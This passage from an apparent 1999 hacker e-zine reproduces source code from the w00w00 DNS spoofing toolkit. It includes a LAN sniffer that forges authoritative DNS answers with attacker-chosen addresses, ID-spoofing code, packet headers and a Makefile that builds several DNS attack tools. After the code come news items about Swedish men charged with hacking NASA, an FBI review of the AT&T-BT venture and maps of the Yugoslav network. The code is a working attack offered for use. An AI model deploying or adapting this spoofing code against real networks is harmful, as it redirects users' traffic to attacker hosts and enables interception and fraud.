= (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buf+ETHHDRSIZE); udp = (struct udphdr *)(buf+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if (ip->protocol == IPPROTO_UDP) { printf("[%s:%d ->", (char *)inet_ntoa(ip->saddr), ntohs(udp->source)); printf("%s:%d]\n", (char *)inet_ntoa(ip->daddr), ntohs(udp->dest)); } if (ip->protocol == 17) if (ip->saddr.s_addr == d_ip) if (ip->daddr.s_addr == s_ipns) if (udp->dest == htons(53)) if (dnsrecv->qr == 0) { printf("We have the packet!\n"); ID = dnsrecv->id; /* We have the id. */ printf("the current id of %s is %d \n", argv[2], ntohs(ID)); DA_ID = ntohs(ID); printf("Sending the spoof...\n"); dnsspoof(dnstrust, argv[2], spoofname, spoofip, DA_ID,type); printf("Spoof sent...\n"); exit(0); } } } ----[END of WSDspoofID.c ]---- ----[WSDsniffID.c]---- /* ******************************************************* */ /* w00w00 LAN ID Sniffer Super Raw */ /* ------------------------------------------------------- */ /* w00w00 Security Development (WSD) */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ******************************************************* */ #include #include "WSD-spoof.c" #include "dns.h" #include "WSD-DNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "v0.4" int ETHHDRSIZE; void usage() { printf("Usage: WSDsniffID \n"); printf("Example: WSDsniffID eth0 \"127.0.0.1\" \"www.its.me.com\"\n"); printf("Raw-Powa (WSD)\n"); exit(ERROR); } void main(int argc, char **argv) { int sraw, on = 1, tmp1, type; char *buffer; char *data, *data2; struct pcap *pcap_d; struct pcap_pkthdr h; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv, *dnssend; char host[255]; char tmp2[255]; char ebuf[255]; char buffer2[1024]; char spoofip[255], spoofname[255]; unsigned char names[255]; printf("w00w00 LAN ID SNIFFER! 
Super Raw\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n"); if (argc < 2) usage(); if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if (strlen(argv[2]) > sizeof(spoofip) - 1) { fprintf(stderr, "argv[2] too long: %s\n", argv[2]); exit(ERROR); } if (strlen(argv[3]) > sizeof(spoofip) - 1) { fprintf(stderr, "argv[3] too long: %s\n", argv[3]); exit(ERROR); } strcpy(spoofip, argv[2]); strcpy(spoofname, argv[3]); type = atoi(argv[4]); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+12); bzero(host, sizeof(host)); bzero(buffer2, sizeof(buffer2)); sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { perror("setsockopt"); exit(ERROR); } /* open pcap descriptor */ pcap_d = pcap_open_live(argv[1], sizeof(buffer), 0, 100, ebuf); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if (ip->protocol == 17) if (udp->dest == htons(53)) if (dnsrecv->qr == 0) { strcpy(names, data); nameformat(names, host); printf("We have a DNS question from %s, which wants: %s!\n", (char *)inet_ntoa(ip->saddr), host); bzero(host, sizeof(host)); printf("The question has a type %d " "and type of the query is %d\n", ntohs(*((u_short *)(data+strlen(data)+1))), ntohs(*((u_short *)(data+strlen(data)+2+1)))); printf("Making the spoofed packet...\n"); /* Here we are going to start making the spoofed packet */ memcpy(dnssend, dnsrecv, DNSHDRSIZE+strlen(names)+5); dnssend->id=dnsrecv->id; /* The ID */ dnssend->aa=1; /* I have the authority */ dnssend->ra=1; /* I have the recusion */ dnssend->qr=1; /* It's an answer */ dnssend->rep_num = htons(1); /* I have one awnser */ 
                    printf("ID = %d, Number of question = %d, number of anwser = %d\n",
                           ntohs(dnssend->id), ntohs(dnssend->que_num), ntohs(dnssend->rep_num));
                    printf("Question..\n");
                    printf("domainename = %s\n", data2);
                    printf("type of question = %d\n",
                           ntohs(*((u_short *)(data2+strlen(names)+1))));
                    printf("type of query = %d\n",
                           ntohs(*((u_short *)(data2+strlen(names)+1+2))));

                    /* Answer RR, written right after the question section:
                     * owner name (the qname again), then TYPE, CLASS, TTL,
                     * RDLENGTH and RDATA.  tmp1 is left pointing at the
                     * TYPE field so the prints below work for both types.
                     * The 32-bit fields are written as uint32_t; the
                     * original used u_long, which is 32 bits only on the
                     * ILP32 systems it was written for. */
                    if (type == TYPE_PTR) {
                        tmp1 = strlen(names)+5;
                        strcpy(data2+tmp1, names);
                        tmp1 = tmp1+strlen(names)+1;
                        bzero(tmp2, sizeof(tmp2));
                        nameformat(spoofname, tmp2);
                        rdlen = strlen(tmp2)+1;     /* encoded name incl. its 0 */
                        *((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
                        *((u_short *)(data2+tmp1+2)) = htons(1);
                        *((uint32_t *)(data2+tmp1+2+2)) = htonl(86400);
                        /* original had htons(strlen((tmp2)+1)), i.e. strlen-1 */
                        *((u_short *)(data2+tmp1+2+2+4)) = htons(rdlen);
                        strcpy((data2+tmp1+2+2+4+2), tmp2);
                    }
                    if (type == TYPE_A) {
                        tmp1 = strlen(names)+5;
                        strcpy(data2+tmp1, names);
                        tmp1 = tmp1+strlen(names)+1;
                        rdlen = 4;
                        *((u_short *)(data2+tmp1)) = htons(TYPE_A);
                        *((u_short *)(data2+tmp1+2)) = htons(1);
                        *((uint32_t *)(data2+tmp1+2+2)) = htonl(86400);
                        *((u_short *)(data2+tmp1+2+2+4)) = htons(4);
                        *((uint32_t *)(data2+tmp1+2+2+4+2)) = host2ip(spoofip);
                    }

                    printf("Answer..\n");
                    printf("domainname = %s\n", tmp2);
                    printf("type = %d\n", ntohs(*((u_short *)(data2+tmp1))));
                    printf("classe = %d\n", ntohs(*((u_short *)(data2+tmp1+2))));
                    printf("time to live = %lu\n",
                           (unsigned long)ntohl(*((uint32_t *)(data2+tmp1+2+2))));
                    printf("resource data length = %d\n",
                           ntohs(*((u_short *)(data2+tmp1+2+2+4))));
                    if (type == TYPE_A) {
                        struct in_addr ia;
                        ia.s_addr = *((uint32_t *)(data2+tmp1+2+2+4+2));
                        printf("IP = %s\n", inet_ntoa(ia));
                    }

                    /* Now tmp1 == the total length of packet dns without the
                     * dnshdr: question, owner name, 10 bytes of RR header
                     * and the RDATA */
                    tmp1 = tmp1+2+2+4+2+rdlen;
                    /* reply from the queried server's address and port back
                     * to the client's source port */
                    udp_send(sraw, ip->daddr.s_addr, ip->saddr.s_addr,
                             ntohs(udp->dest), ntohs(udp->source),
                             buffer2, DNSHDRSIZE+tmp1);
                }
    }
}
----[END of WSDsniffID.c ]----

----[udp.h ]----
struct udphdr {
    u_short source;         /* source port */
    u_short dest;           /* destination port */
    u_short len;            /* udp length */
    u_short check;          /* udp checksum */
};
----[END of udp.h]----

----[ dns.h ]----
#define DNSHDRSIZE 12

/*
 * RFC 1035 header.  The bit-fields are declared in the order gcc allocates
 * them on little-endian hosts (first field in the lowest bit of the byte),
 * which is what makes rd/tc/aa/opcode/qr line up with the wire layout
 * QR, opcode, AA, TC, RD and rcode/unused/pr/ra with RA, Z, RCODE.  On a
 * big-endian host the fields would have to be declared in reverse order.
 */
struct dnshdr {
    unsigned short int id;
    unsigned char rd:1;
    unsigned char tc:1;
    unsigned char aa:1;
    unsigned char opcode:4;
    unsigned char qr:1;
    unsigned char rcode:4;
    unsigned char unused:2;
    unsigned char pr:1;
    unsigned char ra:1;
    unsigned short int que_num;
    unsigned short int rep_num;
    unsigned short int num_rr;
    unsigned short int num_rrsup;
};
----[ END of dns.h ]----

----[ ip.h ]----
/* adapted from tcpdump */
#ifndef IPVERSION
#define IPVERSION 4
#endif /* IPVERISON */

struct iphdr {
    u_char ihl:4,               /* header length */
           version:4;           /* version */
    u_char tos;                 /* type of service */
    short tot_len;              /* total length */
    u_short id;                 /* identification */
    short off;                  /* fragment offset field */
#define IP_DF 0x4000            /* dont fragment flag */
#define IP_MF 0x2000            /* more fragments flag */
    u_char ttl;                 /* time to live */
    u_char protocol;            /* protocol */
    u_short check;              /* checksum */
    struct in_addr saddr, daddr; /* source and dest address */
};

#ifndef IP_MAXPACKET
#define IP_MAXPACKET 65535
#endif /* IP_MAXPACKET */
----[ END of ip.h ]----

----[bpf.h]----
/*-
 * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
 *      The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from the Stanford/CMU enet packet filter,
 * (net/enet.c) distributed as part of 4.3BSD, and code contributed
 * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
 * Berkeley Laboratory.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1.
 *    Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by the University of
 *      California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *      @(#)bpf.h       7.1 (Berkeley) 5/7/91
 *
 * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
 */

#ifndef BPF_MAJOR_VERSION

/* BSD style release date */
#define BPF_RELEASE 199606

typedef int bpf_int32;
typedef u_int bpf_u_int32;

/*
 * Alignment macros.  BPF_WORDALIGN rounds up to the next
 * even multiple of BPF_ALIGNMENT.
 */
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))

#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32

/*
 * Structure for BIOCSETF.
 */
struct bpf_program {
    u_int bf_len;
    struct bpf_insn *bf_insns;
};

/*
 * Struct returned by BIOCGSTATS.
 */
struct bpf_stat {
    u_int bs_recv;          /* number of packets received */
    u_int bs_drop;          /* number of packets dropped */
};

/*
 * Struct return by BIOCVERSION.  This represents the version number of
 * the filter language described by the instruction encodings below.
 * bpf understands a program iff kernel_major == filter_major &&
 * kernel_minor >= filter_minor, that is, if the value returned by the
 * running kernel has the same major number and a minor number equal
 * equal to or less than the filter being downloaded.  Otherwise, the
 * results are undefined, meaning an error may be returned or packets
 * may be accepted haphazardly.
 * It has nothing to do with the source code version.
 */
struct bpf_version {
    u_short bv_major;
    u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1

/*
 * BPF ioctls
 *
 * The first set is for compatibility with Sun's pcc style
 * header files.  If your using gcc, we assume that you
 * have run fixincludes so the latter set should work.
 */
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define BIOCGBLEN       _IOR(B,102, u_int)
#define BIOCSBLEN       _IOWR(B,102, u_int)
#define BIOCSETF        _IOW(B,103, struct bpf_program)
#define BIOCFLUSH       _IO(B,104)
#define BIOCPROMISC     _IO(B,105)
#define BIOCGDLT        _IOR(B,106, u_int)
#define BIOCGETIF       _IOR(B,107, struct ifreq)
#define BIOCSETIF       _IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT   _IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT   _IOR(B,110, struct timeval)
#define BIOCGSTATS      _IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE   _IOW(B,112, u_int)
#define BIOCVERSION     _IOR(B,113, struct bpf_version)
#define BIOCSTCPF       _IOW(B,114, struct bpf_program)
#define BIOCSUDPF       _IOW(B,115, struct bpf_program)
#else
#define BIOCGBLEN       _IOR('B',102, u_int)
#define BIOCSBLEN       _IOWR('B',102, u_int)
#define BIOCSETF        _IOW('B',103, struct bpf_program)
#define BIOCFLUSH       _IO('B',104)
#define BIOCPROMISC     _IO('B',105)
#define BIOCGDLT        _IOR('B',106, u_int)
#define BIOCGETIF       _IOR('B',107, struct ifreq)
#define BIOCSETIF       _IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT   _IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT   _IOR('B',110, struct timeval)
#define BIOCGSTATS      _IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE   _IOW('B',112, u_int)
#define BIOCVERSION     _IOR('B',113, struct bpf_version)
#define BIOCSTCPF       _IOW('B',114, struct bpf_program)
#define BIOCSUDPF       _IOW('B',115, struct bpf_program)
#endif

/*
 * Structure prepended to each packet.
 */
struct bpf_hdr {
    struct timeval  bh_tstamp;  /* time stamp */
    bpf_u_int32     bh_caplen;  /* length of captured portion */
    bpf_u_int32     bh_datalen; /* original length of packet */
    u_short         bh_hdrlen;  /* length of bpf header (this struct
                                   plus alignment padding) */
};
/*
 * Because the structure above is not a multiple of 4 bytes, some compilers
 * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
 * Only the kernel needs to know about it; applications use bh_hdrlen.
 */
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif

/*
 * Data-link level type codes.
 */
#define DLT_NULL        0       /* no link-layer encapsulation */
#define DLT_EN10MB      1       /* Ethernet (10Mb) */
#define DLT_EN3MB       2       /* Experimental Ethernet (3Mb) */
#define DLT_AX25        3       /* Amateur Radio AX.25 */
#define DLT_PRONET      4       /* Proteon ProNET Token Ring */
#define DLT_CHAOS       5       /* Chaos */
#define DLT_IEEE802     6       /* IEEE 802 Networks */
#define DLT_ARCNET      7       /* ARCNET */
#define DLT_SLIP        8       /* Serial Line IP */
#define DLT_PPP         9       /* Point-to-point Protocol */
#define DLT_FDDI        10      /* FDDI */
#define DLT_ATM_RFC1483 11      /* LLC/SNAP encapsulated atm */
#define DLT_RAW         12      /* raw IP */
#define DLT_SLIP_BSDOS  13      /* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS   14      /* BSD/OS Point-to-point Protocol */

/*
 * The instruction encondings.
 */
/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define         BPF_LD          0x00
#define         BPF_LDX         0x01
#define         BPF_ST          0x02
#define         BPF_STX         0x03
#define         BPF_ALU         0x04
#define         BPF_JMP         0x05
#define         BPF_RET         0x06
#define         BPF_MISC        0x07

/* ld/ldx fields */
#define BPF_SIZE(code)  ((code) & 0x18)
#define         BPF_W           0x00
#define         BPF_H           0x08
#define         BPF_B           0x10
#define BPF_MODE(code)  ((code) & 0xe0)
#define         BPF_IMM         0x00
#define         BPF_ABS         0x20
#define         BPF_IND         0x40
#define         BPF_MEM         0x60
#define         BPF_LEN         0x80
#define         BPF_MSH         0xa0

/* alu/jmp fields */
#define BPF_OP(code)    ((code) & 0xf0)
#define         BPF_ADD         0x00
#define         BPF_SUB         0x10
#define         BPF_MUL         0x20
#define         BPF_DIV         0x30
#define         BPF_OR          0x40
#define         BPF_AND         0x50
#define         BPF_LSH         0x60
#define         BPF_RSH         0x70
#define         BPF_NEG         0x80
#define         BPF_JA          0x00
#define         BPF_JEQ         0x10
#define         BPF_JGT         0x20
#define         BPF_JGE         0x30
#define         BPF_JSET        0x40
#define BPF_SRC(code)   ((code) & 0x08)
#define         BPF_K           0x00
#define         BPF_X           0x08

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code)  ((code) & 0x18)
#define         BPF_A           0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define         BPF_TAX         0x00
#define         BPF_TXA         0x80

/*
 * The instruction data structure.
 */
struct bpf_insn {
    u_short     code;
    u_char      jt;
    u_char      jf;
    bpf_int32   k;
};

/*
 * Macros for insn array initializers.
 */
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }

#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
#if __STDC__
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif
#endif

/*
 * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
 */
#define BPF_MEMWORDS 16

#endif
----[ END of bpf.h ]----

---[pcap.h ]---
/*
 * Copyright (c) 1993, 1994, 1995, 1996, 1997
 *      The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by the Computer Systems
 *      Engineering Group at Lawrence Berkeley Laboratory.
 * 4. Neither the name of the University nor of the Laboratory may be used
 *    to endorse or promote products derived from this software without
 *    specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
 */

#ifndef lib_pcap_h
#define lib_pcap_h

/* the four header names below were lost when this issue was extracted;
 * they are the ones libpcap 0.4's pcap.h (this $Header revision) includes */
#include <sys/types.h>
#include <sys/time.h>

#include <net/bpf.h>

#include <stdio.h>

#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4

#define PCAP_ERRBUF_SIZE 256

/*
 * Compatibility for systems that have a bpf.h that
 * predates the bpf typedefs for 64-bit support.
 */
#if BPF_RELEASE - 0 < 199406
typedef int bpf_int32;
typedef u_int bpf_u_int32;
#endif

typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
 * The first record in the file contains saved values for some
 * of the flags used in the printout phases of tcpdump.
 * Many fields here are 32 bit ints so compilers won't insert unwanted
 * padding; these files need to be interchangeable across architectures.
 */
struct pcap_file_header {
    bpf_u_int32 magic;
    u_short version_major;
    u_short version_minor;
    bpf_int32 thiszone;     /* gmt to local correction */
    bpf_u_int32 sigfigs;    /* accuracy of timestamps */
    bpf_u_int32 snaplen;    /* max length saved portion of each pkt */
    bpf_u_int32 linktype;   /* data link type (DLT_*) */
};

/*
 * Each packet in the dump file is prepended with this generic header.
 * This gets around the problem of different headers for different
 * packet interfaces.
 */
struct pcap_pkthdr {
    struct timeval ts;      /* time stamp */
    bpf_u_int32 caplen;     /* length of portion present */
    bpf_u_int32 len;        /* length this packet (off wire) */
};

/*
 * As returned by the pcap_stats()
 */
struct pcap_stat {
    u_int ps_recv;          /* number of packets received */
    u_int ps_drop;          /* number of packets dropped */
    u_int ps_ifdrop;        /* drops by interface XXX not yet supported */
};

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
                             const u_char *);

char    *pcap_lookupdev(char *);
int     pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t  *pcap_open_live(char *, int, int, int, char *);
pcap_t  *pcap_open_offline(const char *, char *);
void    pcap_close(pcap_t *);
int     pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int     pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
        pcap_next(pcap_t *, struct pcap_pkthdr *);
int     pcap_stats(pcap_t *, struct pcap_stat *);
int     pcap_setfilter(pcap_t *, struct bpf_program *);
void    pcap_perror(pcap_t *, char *);
char    *pcap_strerror(int);
char    *pcap_geterr(pcap_t *);
int     pcap_compile(pcap_t *, struct bpf_program *, char *, int,
                     bpf_u_int32);
/* XXX */
int     pcap_freecode(pcap_t *, struct bpf_program *);
int     pcap_datalink(pcap_t *);
int     pcap_snapshot(pcap_t *);
int     pcap_is_swapped(pcap_t *);
int     pcap_major_version(pcap_t *);
int     pcap_minor_version(pcap_t *);

/* XXX */
FILE    *pcap_file(pcap_t *);
int     pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void    pcap_dump_close(pcap_dumper_t *);
void    pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int   bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char    *bpf_image(struct bpf_insn *, int);

#endif
----[ END of pcap.h ]----

----[Makefile]----
# Version 0.2
SHELL = /bin/sh

# Uncomment this if you're not on Linux
#LIBS = -lsocket -lnsl -lpcap

CC = gcc
RM = /bin/rm
BIN = .
#BIN = w00w00/bins
LIBS = -lpcap
CFLAGS = -I. -L.
all: WSDkillDNS WSDspoofID WSDsniffID WSD-baddns WSD-IDpred

WSDkillDNS: WSDkillDNS.c
	$(CC) $(CFLAGS) WSDkillDNS.c $(LIBS) -o $(BIN)/WSDkillDNS

WSDspoofID: WSDspoofID.c
	$(CC) $(CFLAGS) WSDspoofID.c $(LIBS) -o $(BIN)/WSDspoofID

WSDsniffID: WSDsniffID.c
	$(CC) $(CFLAGS) WSDsniffID.c $(LIBS) -o $(BIN)/WSDsniffID

WSD-baddns: WSD-baddns.c
	$(CC) $(CFLAGS) WSD-baddns.c $(LIBS) -o $(BIN)/WSD-baddns

WSD-IDpred: WSD-IDpred.c
	$(CC) $(CFLAGS) WSD-IDpred.c $(LIBS) -o $(BIN)/WSD-IDpred
----[END of Makefile ]----

@HWA

34.0 2 Swedish men charged with hacking U.S computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.usatoday.com/life/cyber/tech/ctf865.htm

2 charged for hacking U.S. computers

STOCKHOLM, Sweden (AP) -- Two Swedish men were charged Monday with hacking
into the computer systems of NASA and the U.S. military. Prosecutors said the
intent apparently was not to steal anything, though NASA reportedly spent a
lot of money to make sure it didn't happen again.

State prosecutor Yngve Rydberg called the crimes ''digital graffiti.'' Trial
was set for sometime this fall. Rydberg said he expected the two suburban
Stockholm men would be fined, but not jailed.

Charlie Malm and Joel Soederberg, both 24, were charged with violating
Sweden's computer laws and buying stolen equipment. Malm works at a
kindergarten, Rydberg for an Internet company.

Contacted by The Associated Press, Soederberg declined to comment. Malm did
not return a phone call placed to his home.

The NASA break-in allegedly occurred between October and December 1996.
Soederberg was detained for two weeks in early 1997. Malm has never been
detained, Rydberg said.

''They didn't reach the holiest parts of the systems,'' he said, adding they
failed in an attempt to infect NASA's computer system with a virus.

The two also allegedly hacked into the computer systems of the U.S.
Air Force, Army and Marines, and the British Internet company Wide
Intellectual Resources, according to the charges.
NASA intends to demonstrate in the trial that Malm and Soederberg ''caused
NASA great economic loss,'' court documents stated.

Thomas Talleur, director of NASA's computer crime unit, said the space agency
suffers a lot of intrusions. ''Anybody who provides as many open sites as we
do leaves itself open to attacks,'' he said in a telephone interview, adding
that the agency mostly investigates hacker intrusions when organized crime is
suspected.

@HWA

35.0 Feds Delay network
~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague

The feds are delaying a joint AT&T and British telecom venture that would
create a transatlantic telecom network. Apparently the feds want to make sure
they have access to the network for wiretapping purposes and to protect U.S.
citizens against monitoring by foreign governments. (For some reason I don't
buy the protection part.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2315342,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

DOJ, FBI delay AT&T-BT plans
By Kathy Chen and Rebecca Blumenstein, WSJ Interactive Edition
August 16, 1999 2:32 PM PT
URL:

U.S. officials are reviewing a planned joint venture between AT&T Corp. and
British Telecommunications PLC for its possible effects on law enforcement and
national security, delaying approval of the trans-Atlantic telecom agreement.

The Federal Bureau of Investigation and the Department of Justice's criminal
division are holding talks with the companies to resolve concerns over the
plan to form a $10 billion global venture, people familiar with the situation
said.

The review appears to be part of a larger trend of law-enforcement agencies
weighing in on telecommunications deals. While the Federal Communications
Commission traditionally has overseen approval of such deals, the
law-enforcement agencies may want to ensure they have access to telecom
networks for approved wiretapping operations, as well as that U.S. citizens
are protected against monitoring by foreign governments. Growing investments
by foreign companies and the introduction of new phone technologies are
complicating their efforts. The result has been increased participation by
the agencies in vetting telecom deals -- and delays for the companies.

Down but not out

While the agencies' concerns aren't likely to scuttle the AT&T-BT alliance,
they are holding up its approval. FCC officials have completed their review
of the venture, which was announced in July 1998, but are awaiting word from
the Justice Department and FBI, which have been in talks with the firms for
more than two months, according to people familiar with the situation.

Both AT&T (NYSE:T) and BT declined to comment on whether they are involved in
talks with law-enforcement agencies. But AT&T spokesman Jim McGann said, "We
continue to believe approval of the deal is on track." The firms have said
they would like to wrap up the deal by October. The Justice Department and FBI
said they don't comment on specific cases.

The AT&T-BT venture aims to provide international companies with voice, video
and data services. The companies are combining international operations with
about $10 billion in annual revenue. European regulators, which recently have
begun looking at telecom deals more carefully, have approved the venture.

The specific nature of the FBI and Justice Department concerns remains
unclear. If several past and continuing cases offer any clue, they are likely
to involve the agencies' desires to ensure continued access to telecom
networks for wiretapping purposes and to protect the privacy of U.S. citizens.

In one of the first cases addressed by the agencies -- BT's planned
acquisition of MCI Communications announced in 1996 -- the FBI and Justice
Department required the companies to set up a separate subsidiary to take
over all of MCI's business with U.S. government agencies. The agencies also
asked the companies to implement other security measures, such as agreeing
not to store billing information outside the U.S. for a certain period of
time. That information is sometimes subpoenaed by law-enforcement officials
for criminal investigations, and storage in the U.S. would facilitate
continued access. The deal later fell through for unrelated reasons.

Law-enforcement agencies recently approved a merger between AirTouch
Communications Inc. and United Kingdom-based Vodafone, now Vodafone AirTouch
PLC. AirTouch spokesman Jonathan Marshall said the companies engaged in
several months of negotiations with the agencies over how to address security
issues and agreed to conditions aimed at guaranteeing the government's right
to intercept communications over their U.S. wireless networks.

@HWA

36.0 The Effects of War on the Yugoslavian Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Michelle

While the NATO bombings may have had some detrimental effects, it doesn't
look like Yugoslavia was completely cut off during the war. The people at the
Internet Mapping Project compiled some graphical network maps every day
during the bombing. Pretty interesting to look at. (Look for the mpeg at the
bottom.)

The Internet Mapping Project
http://www.cs.bell-labs.com/~ches/map

The Effects of War on the Yugoslavian Network
http://www.cs.bell-labs.com/~ches/map/yu/index.html

The effects of war on the Yugoslavian Network.
- Steven Branigan & Bill Cheswick

Starting at the end of March, we mapped the Yugoslavian network daily. A
chart of the reachability shows that the network was pretty stable until
about May 3, 1999.
